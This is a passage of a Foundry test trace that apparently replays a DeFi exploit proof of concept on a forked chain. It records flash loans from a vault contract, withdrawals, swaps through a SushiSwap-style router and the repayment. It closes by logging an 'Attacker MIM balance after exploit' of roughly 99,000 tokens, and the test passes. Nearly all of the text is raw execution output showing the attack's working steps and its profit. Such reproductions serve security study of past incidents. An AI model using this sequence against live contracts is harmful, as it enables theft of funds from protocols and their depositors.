    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000006595d766bd714734309 → 0x000000000000000000000000000000000000000000005ea81bdd92363bea7a1f
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit LogWithdraw(param0: 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 417020816507258057209622 [4.17e23], param4: 417003633781822147542951 [4.17e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdc713e4788f18364979da14df02d721734a3959fa76f1b0c669b11ca2398a95d: 0x0000000000012c2828f494d59a5af5b50000000000012c2b5381ae48d381fb03 → 0x000000000000d3da5902bc356b5ab60e000000000000d3dc951a87e9ac0ac3ed
    │   │   │   │   @ 0x9ab559b979f9128f90f5e84d944863dd68bdfd8533dec3495a6f30d87a75ba75: 0x00000000000000000000000000000000000000000000584dcff1d8a02f003fa7 → 0
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000584ebe67265f2777371600000000000000000000000000000000000000000000584dcff1d8a02f003fa7
    │   │   ├─ [805] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::balanceOf(0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   └─ ← [Return] 105231909220080684690094 [1.052e23]
    │   │   ├─ [39139] 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966::withdraw(0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 105231909220080684690094 [1.052e23])
    │   │   │   ├─ [29783] 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 105231909429484450984384 [1.052e23])
    │   │   │   │   ├─ emit Transfer(from: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 105231909429484450984384 [1.052e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x000000000000000000000000000000000000000000adf739fe307e0771a62873 → 0x000000000000000000000000000000000000000000ade0f15c146a76ddd276b3
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000001648a21c139093d3b1c0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit LogWithdraw(param0: 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 105231909429484450984384 [1.052e23], param4: 105231909220080684690094 [1.052e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1d05d9deb7441498ec03ffc47a8dfec1015b8358e807b1feefda1261fcdae1f8: 0x0000000000adf739f861aa2d2bc2ae280000000000adf739fe307e0771a62873 → 0x0000000000ade0f1564655103509c37a0000000000ade0f15c146a76ddd276b3
    │   │   │   │   @ 0x20473f51e52fdaeb21ff28e3327b2eca821ea292ab03216132449e1c48b02cee: 0x000000000000000000000000000000000000000000001648a21b551cf6b8eaae → 0
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000001648a21c139093d3b1c0000000000000000000000000000000000000000000001648a21b551cf6b8eaae
    │   │   ├─ [490] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 447003510315900362979871 [4.47e23]
    │   │   ├─ [121042] 0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F::swapTokensForExactTokens(3221489684099637020129 [3.221e21], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77], [0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1667946419 [1.667e9])
    │   │   │   ├─ [2517] 0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 399845651522815193946320 [3.998e23], 555477135831591436907 [5.554e20], 1667945807 [1.667e9]
    │   │   │   ├─ [2517] 0x07D5695a24904CC1B6e3bd57cC7780B90618e3c4::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 188453319282458810906661 [1.884e23], 142175854896740493956 [1.421e20], 1667943623 [1.667e9]
    │   │   │   ├─ [8267] 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x07D5695a24904CC1B6e3bd57cC7780B90618e3c4, 6214115394844221896086 [6.214e21])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x07D5695a24904CC1B6e3bd57cC7780B90618e3c4, value: 6214115394844221896086 [6.214e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000001648a21c139093d3b1c0 → 0x0000000000000000000000000000000000000000000014f7c3ef4fbf93b9bc2a
    │   │   │   │   │   @ 0x69309c40d4efc35170467211880793993a9ca709668fbc0276cce8df66092302: 0x0000000000000000000000000000000000000000000027e8132d3aeb15e3f825 → 0x000000000000000000000000000000000000000000002938f159febc15fdedbb
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [48174] 0x07D5695a24904CC1B6e3bd57cC7780B90618e3c4::swap(0, 4525312829501102873 [4.525e18], 0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7, 0x)
    │   │   │   │   ├─ [12862] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7, 4525312829501102873 [4.525e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0x07D5695a24904CC1B6e3bd57cC7780B90618e3c4, to: 0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7, value: 4525312829501102873 [4.525e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xe74eef0a77feef61a512352c6d67d19c6777a09854d041c6c84bf82fe1b30d93: 0x00000000000000000000000000000000000000000000001e1ccb37fead6a426b → 0x00000000000000000000000000000000000000000000001e5b985c0981589d84
    │   │   │   │   │   │   @ 0xc13c31627b43d8ae580bffddfb0e71fdb261980cdf65d419f02955465a4ef4d3: 0x000000000000000000000000000000000000000000000007b5161abfa5b2ea84 → 0x0000000000000000000000000000000000000000000000077648f6b4d1c48f6b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [582] 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3::balanceOf(0x07D5695a24904CC1B6e3bd57cC7780B90618e3c4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 194667434677303032802747 [1.946e23]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x07D5695a24904CC1B6e3bd57cC7780B90618e3c4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 137650542067239391083 [1.376e20]
    │   │   │   │   ├─ emit Sync(reserve0: 194667434677303032802747 [1.946e23], reserve1: 137650542067239391083 [1.376e20])
    │   │   │   │   ├─ emit Swap(sender: 0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F, amount0In: 6214115394844221896086 [6.214e21], amount1In: 0, amount0Out: 0, amount1Out: 4525312829501102873 [4.525e18], to: 0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 0x000000000000000000000000001aecc3417f52a8a0f9454f82fc71f9a3d98d7c → 0x000000000000000000000000001aecfbce620e00d0a792c260bf6f3b3033a880
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000004e0437414968a706f1bee4b8a3fcd537 → 0x000000000000000000000000000000004e06534303dc6ab68fba905cefc78e83
    │   │   │   │   │   @ 8: 0x636accc7000000000007b5161abfa5b2ea840000000027e8132d3aeb15e3f825 → 0x636ad7b30000000000077648f6b4d1c48f6b000000002938f159febc15fdedbb
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [40866] 0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7::swap(3221489684099637020129 [3.221e21], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [8146] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3221489684099637020129 [3.221e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3221489684099637020129 [3.221e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x83cef273285dc689a828b24143ff70fff6f9e4f54e620c063786797ee641a577: 0x0000000000000000000000000000000000000000000054abad1b92f1eb2698d0 → 0x0000000000000000000000000000000000000000000053fd09f51b70b2ed12ef
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000005ea81bdd92363bea7a1f → 0x000000000000000000000000000000000000000000005f56bf0409b774240000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [490] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::balanceOf(0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7) [staticcall]
    │   │   │   │   │   └─ ← [Return] 396624161838715556926191 [3.966e23]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x36e2FCCCc59e5747Ff63a03ea2e5C0c2C14911e7) [staticcall]
    │   │   │   │   │   └─ ← [Return] 560002448661092539780 [5.6e20]
    │   │   │   │   ├─ emit Sync(reserve0: 396624161838715556926191 [3.966e23], reserve1: 560002448661092539780 [5.6e20])
    │   │   │   │   ├─ emit Swap(sender: 0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F, amount0In: 0, amount1In: 4525312829501102873 [4.525e18], amount0Out: 3221489684099637020129 [3.221e21], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000038f818df908f1c40e0eeef27057af28c0 → 0x000000000000000000000000000000038f8267a045b13be2644d254d6a32530c
    │   │   │   │   │   @ 10: 0x00000000000000000000000000075fb7479db606f5c34eba18d68f62d3e68398 → 0x00000000000000000000000000075fbe0071dd42b2960a3a1caa6390a0fba928
    │   │   │   │   │   @ 8: 0x636ad54f00000000001e1ccb37fead6a426b0000000054abad1b92f1eb2698d0 → 0x636ad7b300000000001e5b985c0981589d840000000053fd09f51b70b2ed12ef
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [6214115394844221896086 [6.214e21], 4525312829501102873 [4.525e18], 3221489684099637020129 [3.221e21]]
    │   │   ├─ [3346] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::transfer(0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, 450225000000000000000000 [4.502e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xF5BCE5077908a1b7370B9ae04AdC565EBd643966, value: 450225000000000000000000 [4.502e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000005f56bf0409b774240000 → 0
    │   │   │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x0000000000000000000000000000000000000000000074920897121856cac5c9 → 0x00000000000000000000000000000000000000000000d3e8c79b1bcfcaeec5c9
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xd6027713649db96a7427593ee05c61077713986bcab6a15bce4505d409ad8efc: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000056258d7ec79888a → 0x000000000000000000000000000000000000000000000000076781f983c69954
    │   │   │   @ 0x83515b6aaac456746f934e3c04c091481e5bc9ae9c003bb359f3f890ecbb32df: 0x0000000000000000000000000000000000000000000001be589bfc70fd9a3da8 → 0x0000000000000000000000000000000000000000000094ddccba09cf08a9eca2
    │   │   │   @ 0xf21bb6dc87e9907dc6d373ae3b3cb33a5e9180d74724467730bf998256d108ec: 0x00000000000000000000000000000000000000000000006f76ceb429f80846dc → 0x00000000000000000000000000000000000000000000595fb5afcccb368846dc
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000006595d766bd714734309 → 0x000000000000000000000000000000000000000000001648a21c139093d3b1c0
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0x34168c2991b92b9d75053283925dc10c6b710e72444f29eef761915a6c79ad4e: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [490] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::balanceOf(0xF5BCE5077908a1b7370B9ae04AdC565EBd643966) [staticcall]
    │   │   └─ ← [Return] 1000713355631009970701769 [1e24]
    │   ├─ emit LogFlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272, param2: 450000000000000000000000 [4.5e23], param3: 225000000000000000000 [2.25e20], param4: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [582] 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3::balanceOf(0xF5BCE5077908a1b7370B9ae04AdC565EBd643966) [staticcall]
    │   │   └─ ← [Return] 210206429185860621537801907 [2.102e26]
    │   ├─ emit LogFlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3, param2: 0, param3: 0, param4: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 0x665c543999f0cf3a92f4b5af56f9aa8ace16b2da8d7f076cf522abaad51e82df: 0x0000000000000000000000000000000000000000000074920897121856cac5c9 → 0x00000000000000000000000000000000000000000000d3e8c79b1bcfcaeec5c9
    │   │   @ 0xdc713e4788f18364979da14df02d721734a3959fa76f1b0c669b11ca2398a95d: 0x000000000000d3da5902bc356b5ab60e000000000000d3dc951a87e9ac0ac3ed → 0x000000000000d3da5902bc356b5ab60e000000000000d3e8c79b1bcfcaeec3ed
    │   └─ ← [Stop]
    ├─ [582] 0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 99017794034640229088298 [9.901e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker MIM balance after exploit", val: 99017794034640229088298 [9.901e22], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 44.29s (37.88s CPU time)

Ran 2 test suites in 45.43s (44.91s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
